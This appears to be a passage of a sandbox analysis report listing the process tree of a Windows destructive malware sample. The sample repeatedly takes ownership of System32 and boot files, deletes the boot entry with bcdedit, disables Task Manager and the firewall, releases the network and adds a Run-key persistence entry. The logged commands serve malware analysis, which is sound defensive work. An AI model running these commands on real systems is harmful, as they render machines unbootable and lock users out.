        
        PID:8888
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9020
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9132
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8288
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:7604
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DD5B.tmp\DD5C.tmp\DD5D.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:9712
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:9664
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        
        PID:9376
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        
        PID:6592
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:9364
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10464
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        9⤵
        
        PID:11016
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        9⤵
        Views/modifies file attributes
        
        PID:7684
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11096
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        9⤵
        Modifies file permissions
        
        PID:11064
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        9⤵
        Views/modifies file attributes
        
        PID:6236
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8976
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8108
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8956
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8340
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9036
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:5872
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8492
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9244
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9588
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:9916
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:9536
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:6904
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:7280
        
        C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        7⤵
        
        PID:5456
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        7⤵
        
        PID:10912
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5752
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5840
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5912
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5972
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:5188
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:5780
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:5560
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6136
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:5944
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:5688
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:5656
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:1848
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:5196
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:1848
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:6484
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4320
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4324
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4476
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4840
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:1488
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B759.tmp\B76A.tmp\B76B.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:2604
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5116
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:3816
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:2432
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:1808
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1912
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2496
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4972
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Modifies file permissions
        
        PID:4632
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:5196
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:5592
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:6024
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:5388
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:5596
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:5196
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:4472
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:5740
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6196
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6284
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6352
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6428
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6444
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6456
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6564
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6620
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6712
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6872
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7012
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\586C.tmp\586D.tmp\586E.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:6636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3040
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:8212
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:212
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:8340
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8808
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:8832
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:7468
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:9056
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:8892
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:8936
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:9412
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:8320
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:10200
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:2848
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5124
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6732
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:11036
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7100
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5100
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6548
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:1928
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7492
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6C42.tmp\6C43.tmp\6C53.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:7720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:8296
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:8992
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:8660
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:9056
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:6132
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4828
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:8508
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5872
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:10164
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:9416
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:10208
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:7756
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:9684
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:10300
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:10456
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7464
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:2304
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7604
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7764
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7924
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:8080
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7520
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\89DC.tmp\89DD.tmp\89DE.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:7740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:9048
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:6584
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:5544
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:9068
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8528
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5124
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:9512
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:9968
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:9552
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:5712
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:6312
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:10744
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:10956
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:11204
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:10372
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6748
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7608
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7736
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:7624
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7788
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7376
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7308
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3272
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7152
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:7352
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:8696
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:3916
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:8336
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:9084
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Modifies file permissions
        
        PID:2524
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:744
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4996
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:1348
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:2676
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:4236
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BAD4.tmp\BAD5.tmp\BAD6.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:4336
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:1776
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:1540
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:4328
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5000
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        
        PID:4480
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:2544
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4328
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4968
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:2752
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:1540
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:5264
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:5580
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:5708
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:5816
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:2488
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:2572
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5460
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5688
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5480
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6176
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6248
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6264
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6328
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6416
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6536
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:6664
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\506D.tmp\506E.tmp\506F.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:6896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:1060
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:4296
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7712
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:4532
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3440
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:860
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:860
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8332
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:8400
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8892
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:952
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5828
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:9528
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:9784
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6104
        
        C:\Windows\system32\reg.exe
        
